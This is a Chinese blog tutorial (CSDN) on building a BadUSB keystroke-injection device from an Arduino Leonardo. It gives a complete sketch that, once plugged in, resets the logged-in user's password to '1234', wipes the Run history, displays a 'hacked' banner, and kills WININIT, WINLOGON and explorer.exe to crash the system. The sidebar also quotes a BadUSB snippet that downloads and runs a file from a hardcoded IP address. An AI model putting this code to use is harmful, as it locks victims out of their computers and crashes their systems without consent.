疯狂的极客--制作BadUSB

最新推荐文章于 2024-06-07 17:36:11 发布
最新推荐文章于 2024-06-07 17:36:11 发布
阅读量802 收藏 16
点赞数 1
分类专栏: 疯狂的极客 文章标签: 单片机 嵌入式硬件
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Peter_FHC/article/details/125051649
版权

文章目录

设备

1、 能够制作badusb的几种常见载体有:Arduino Leonardo、Phison、Teensy、Attiny85、PS2303(芯片)、RUBBER DUCKY等。从专业程度和易用性来讲,RUBBER DUCKY最优(Hak5官方提供了许多现成的按键脚本和payload),但价格也最贵。

2、 一台计算机
在这里插入图片描述

软件

下载Arduino开发者工具——Arduino IDE (用来向leonardo烧录程序的软件)
这里是Arduino IDE下载地址:https://www.arduino.cc/en/software.
下载安装较为简单,这里不再赘述。安装后打开软件,你将看到如下所示的界面图:
在这里插入图片描述

打开工具-开发板-开发板管理器
在这里插入图片描述
联网安装Arduino AVR Boards板子:
在这里插入图片描述
回到主界面,开发板选择,选择工具-开发板- Arduino Leonardo。编程器选择,AVRISP mkII,如下图所示
在这里插入图片描述

编写代码(重点)

前面的准备倒不难,关键是你要实现什么样的功能。
这里有个快速编写命令的工具:Automator
这里附上GitHub上的下载地址:https://github.com/Catboy96/Automator

这里附上一个更改用户的密码、显示蓝屏的代码:

#include<Keyboard.h>
void setup() 
{
  //初始化
  Keyboard.begin();//开始键盘通讯
  delay(5000);//延时
  Keyboard.press(KEY_CAPS_LOCK); //按下大写键 这里我们最好这样写 不然大多数电脑在中文输入的情况下就会出现问题
  Keyboard.release(KEY_CAPS_LOCK); //释放大写键
  delay(200);
  Keyboard.press(KEY_LEFT_GUI);//win键
  delay(200);
  Keyboard.press('r');//r键
  delay(200);
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.release('r');
  Keyboard.println("cmd.exe");
  delay(200);
  Keyboard.println("CMD.EXE /C REG DELETE hkcu\\sOFTWARE\\mICROSOFT\\wINDOWS\\cURRENTvERSION\\eXPLORER\\rUNmru /F&NET USER %USERNAME% 1234");//修改密码1234
  delay(200);
  Keyboard.println("color a");//更改命令行颜色(绿色)
  delay(200);
  Keyboard.println("echo ........................................................ >> hacked.txt");//向hacked.txt写内容
  delay(200);
  Keyboard.println("echo ## ## ### ###### ## ## ######## ######## >> hacked.txt");//向hacked.txt写内容
  delay(200);
  Keyboard.println("color 0");//更改命令行颜色(绿色)
  delay(200);
  Keyboard.println("echo ## ## ## ## ## ## ## ## ## ## ## >> hacked.txt");//向hacked.txt写内容
  delay(200);
  Keyboard.println("color 1");//更改命令行颜色(绿色)
  delay(200);
  Keyboard.println("echo ## ## ## ## ## ## ## ## ## ## >> hacked.txt");//向hacked.txt写内容
  delay(200);
  Keyboard.println("color 2");//更改命令行颜色(绿色)
  delay(200);
  Keyboard.println("echo ######### ## ## ## ##### ###### ## ## >> hacked.txt");//向hacked.txt写内容
  delay(200);
  Keyboard.println("color 3");//更改命令行颜色(绿色)
  delay(200);
  Keyboard.println("echo ## ## ######### ## ## ## ## ## ## >> hacked.txt");//向hacked.txt写内容
  delay(200);
  Keyboard.println("color 4");//更改命令行颜色(绿色)
  delay(200);
  Keyboard.println("echo ## ## ## ## ## ## ## ## ## ## ## >> hacked.txt");//向hacked.txt写内容
  delay(200);
  Keyboard.println("color 5");//更改命令行颜色(绿色)
  delay(200);
  Keyboard.println("echo ## ## ## ## ###### ## ## ######## ######## >> hacked.txt");//向hacked.txt写内容
  delay(200);
  Keyboard.println("color 6");//更改命令行颜色(绿色)
  delay(200);
  Keyboard.println("echo ........................................................ >> hacked.txt");//向hacked.txt写内容
  delay(200);
  Keyboard.println("color c");//更改命令行颜色(红色)
  delay(200);
   Keyboard.println("cls");//更改命令行颜色(红色)
  delay(200);
  Keyboard.println("type hacked.txt");//将hacked.txt文件内容打印在cmd
  delay(200);
  Keyboard.println("CMD /C START /MIN CMD /C REG DELETE hkcu\\sOFTWARE\\mICROSOFT\\wINDOWS\\cURRENTvERSION\\eXPLORER\\rUNmru /F&CMD /C START /MIN CMD /C NTSD -C Q -PN WINLOGON.EXE 1>NUL 2>NUL&TASKKILL /F /IM WININIT.EXE 2>NUL");//蓝屏XP、7
  delay(200);
  Keyboard.println("taskkill /f /im explorer.exe");//删除桌面进程(all)
  delay(200);
  Keyboard.end();//结束键盘通讯
 
}
void loop()//循环
{

}

写好代码后,点击左上角的那个对号进行编译,没有报错信息一般就是成功了。最后,插上你的usb,点击左上角第二个箭头符号进行上传,等待个几十秒就成功了。

奇异维度
关注
  • 1
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
疯狂--初识BadUSB
Peter_FHC的博客
05-27 2401
BadUSB是一种使用带有恶意软件编程的USB设备的计算机安全攻击,主流有四种工具,本文便对其做简单介绍。
BadUSB-code:收集badusb的一些利用方式及代码
05-12
BadUSB-code 收集badusb的一些利用方式及代码 ino_code 中的.ino代码为上传到硬件的代码,无需服务器中配置。 ##代码涉及OS版本 代码适用版本在文件名中用括号标明。 win xp,7,8,10 Kali 原理及制作可参考: 特别感谢HackPanda大牛的代码和技术支持!向前辈学习!
badusb详细制作教程(两种方式实现远控)
热门推荐
Ghost_system的博客
08-17 1万+
badusb是一种几乎可以突破任何杀毒软件和防火墙的设备,堪称渗透测试利器 文章目录前言一、什么是badusb?二,badusb的优点三,badusb是如何攻击的?badusb原理HID攻击漏洞产生原因三、准备步骤1.设备2,编辑器的安装与设置四,编写代码(重点)第一种: SEToolkit + badusb实现PowerShell注入攻击第二种:Cobalt Strike + badusb 实现PowerShell注入攻击五,烧录六,badusb有多强大攻击场景总结 BadUSB是《黑军团》中
BadUsb程序大全-值得收藏
门柚的博客
07-31 1555
BadUsb程序大全-值得收藏
什么是BadUSB攻击以及如何预防
ITmoster的博客
12-09 3937
BadUSB 是带有嵌入式固件的闪存驱动器,可用于重新编程设备并允许它充当人机界面小工具,例如键盘、鼠标或耳机。它们用于通过有效地伪装成人机接口设备 (HID) 在计算机上执行各种操作。换句话说,BadUSB是虚拟键盘,可以预先编程以在计算机上键入字符,而无需物理操作。一旦插入,他们就可以直接开始工作,甚至执行需要同时使用两个或多个键的复杂击键。
BadUSB制作教程_BadUSB简单示例(初学)_程序编写工具
Jason Xu 的博客
04-10 5701
说明 本文章仅供学习交流,请勿用于非法用途 我用的是CJMCU-Beetle arduino Leonardo USB ATMEGA32U4 Mini Size Development Board 官网购买地址https://www.thanksbuyer.com/cjmcu-beetle-arduino-leonardo-usb-atmega32u4-mini-size-development-board-35975 软件-Arduino Kali下自带 Windows下 官网下载地址 https://
BadUsb制作
qq_34341458的博客
03-09 8069
型号: Digispark kickstarter 微型USB开发板 ATTINY58 就是下面这种 x宝有卖9元左右。 一. 准备: attiny驱动下载:https://www.arduino.cc/en/Main/Software?setlang=cn Arduino IDE:https://www.arduino.cc/en/software 免杀工具(自选):https://github.com/danielbohannon/Invoke-Obfuscation CobaltStrike且有
BadUSB制作教程
weixin_40485904的博客
02-04 1682
BadUSB制作教程BadUSB的优点制作BadUSB的几种板子那么来做一个BadUSB怎么样? 和大多数人一样,最初见到BadUSB是在美剧《黑军团》中,是fsociety组织常用的工具之一,无论是向服务器下载木马控制被害者主机,还是达琳在停车场帅气的扔出大量USB钓鱼,BadUSB都是功不可没的物理武器之一。 剧情中使用Hak5的USB rubber ducky控制目标主机 达琳在停车场扔BadUSB钓鱼 BadUSB的优点 在USB攻击领域,很多年前常用的是老式USB病毒autorun.inf,
SRLabs-BadUSB-Pacsec-v2.pdf
07-30
适用于“邪恶女仆”攻击场景,通过修改usb驱动,欺骗主机,将大容量存储usb设备识别为一个usb键盘,从而能够达成攻击者窃取主机数据的目的。
nginx加php-fpm出现502 bad gateway错误的5种解决方法
09-30
主要介绍了nginx加php-fpm环境中出现502 bad gateway错误的5种解决方法,总结归纳服务器出现502错误的原因多数为连接过多和脚本超时,本文总结了5种解决方法,需要的朋友可以参考下
Badusb下载源码
09-24
Badusb下载源码void setup() {//初始化 Keyboard.begin();//开始键盘通讯 delay(5000);//延时 Keyboard.press(KEY_LEFT_GUI);//win键 delay(500); Keyboard.press('r');//r键 delay(500); Keyboard.release(KEY_LEFT_GUI); Keyboard.release('r'); Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); delay(500); Keyboard.println("POWERSHELL -NOP -W HIDDEN -C sET-eXECUTIONpOLICY UNRESTRICTED -FORCE;(nEW-oBJECT sYSTEM.nET.wEBcLIENT).dOWNLOADfILE('HTTP://182.16.98.84/1.TXT', 'D:1.TXT');START D:1.TXT;EXIT"); Keyboard.press(KEY_CAPS_LOCK); Keyboard.release(KEY_CAPS_LOCK); Keyboard.end();//结束键盘通讯 } void loop()//循环 { }
[Psychson-master] BadUSB制作工程源代码
05-02
2014年GitHub上公布的BadUSB制作的工程源码。 包括:DriveCom、EmbedPayload、firmware、Injector、tools等文件以及使用说明。
badusb_badusb_
09-29
badusb资料,需要自行打包带走
基于Arduino Leonardo的进阶Badusb(Python+SMTP)
zbp_12138的博客
12-24 1793
今天要做的badusb跟上一期比,不太一样的地方是,我加了一个发送邮件的功能,具体来说,就是插入开发板以后,程序自动把该机器的ip地址获取下来,并以邮件的形式发送给指定的收件人.先来看看效果吧: 进阶版BADUSB操作演示 为了让大家看的比较清楚,我没有加入隐藏的功能,这个功能...
badusb代码_BadUSB轻松绕过防护拿下小姐姐的电脑
weixin_39760689的博客
11-28 1221
前言我是掌控安全学院的魔术手,最近公司其他部门招了很多小姐姐,基本都没啥安全意识,电脑离开公司也不关的那种,某一天脑子一抽想着怎么能快速拿下对方的电脑(电脑不关直接创建用户没意思),寻思怎么快速上一个木马,通过msf等生成免杀马感觉没啥意思,还要忽悠人家,影响我形象,于是就想到用一些手边的硬件来实现。手上有一个badusb和raspberry zero w。其中raspberry zer...
系统安全-BadUsb代码以及木马远控的制作(可绕过360)
Coisini的博客
05-31 9124
漏洞背景 是今年计算机安全领域的热门话题之一,该漏洞由Karsten Nohl和Jakob Lell共同发现,并在今年的BlackHat安全大会上公布。BadUsb号称是世界上最邪恶的USB外设。笔者使用他们的代码做了个类似的U盘,用户插入U盘,就会自动执行预置在固件中的恶意代码,下载服务器上恶意文件,执行恶意操作…. 硬件准备 这里我们使用的是: BS Micro pro micro leona...
2021-06-02使用Digispark(ATTINY85)制作一个Badusb
u258710的博客
06-02 2580
使用Digispark(ATTINY85)制作一个Badusb 1.硬件的准备 直接在淘宝搜Digispark就可以,一个板子大概9-30元都有。 2.安装Arduino IDE环境 1.下载Arduino IDE 链接: https://www.arduino.cn/thread-5838-1-1.html2.安装Arduino IDE 直接下一步就行 3.安装驱动 把板子插到usb口时,在设备管理器其它设备这个位置会出现一个未知设备。因为我已经装好了驱动这里就没显示。 点击未知驱动,然后选中更新驱动
badusb制作记录<开发配置问题详解>
geek-7的博客
10-04 609
基于attiny85开发板的badusb创作一、购买开发板attiny85二、驱动程序安装三、安装开发工具Arduino IDE四、配置开发板环境1、下载digistump相关文件2、更改网络文件地址3、配置arduino,下载开发板五、编写程序 一、购买开发板attiny85 上图为usb attiny85开发板,某宝10块钱左右。 整个制作过程无需焊接,只需要插入电脑烧录程序即可。 - . 二、驱动程序安装 1、安装开发板驱动程序,下载驱动文件:https://github.com/digistump
STM32项目分享:智能门禁锁系统
最新发布
qq_44016222的博客
06-07 202
(资料分享见文末)基于STM32智能门禁锁系统。按键解锁:系统通过4×4矩阵键盘模块输入密码进入主菜单门禁刷卡:通过RFID模块刷卡进入主菜单,卡片可以添加或者覆盖删除指纹识别:通过AS608指纹识别模块识别指纹开锁蓝牙APP解锁:通过蓝牙APP输入密码解锁实时时间显示:OLED屏幕显示当前时间,可通过按键修改步进电机:步进电机模拟门锁开关OLED显示:显示用户解锁界面,主菜单以及各项功能界面蜂鸣器报警:密码输入错误蜂鸣器报警。
qt Error - server replied: Bad Request
07-15
"Error - server replied: Bad Request" 是一个HTTP错误,表示服务器无法理解或处理您的请求。这可能是由于以下原因之一造成的: 1. 请求语法错误:请确保您的请求语法正确,包括正确的HTTP方法、正确的URL和正确的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

奇异维度

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值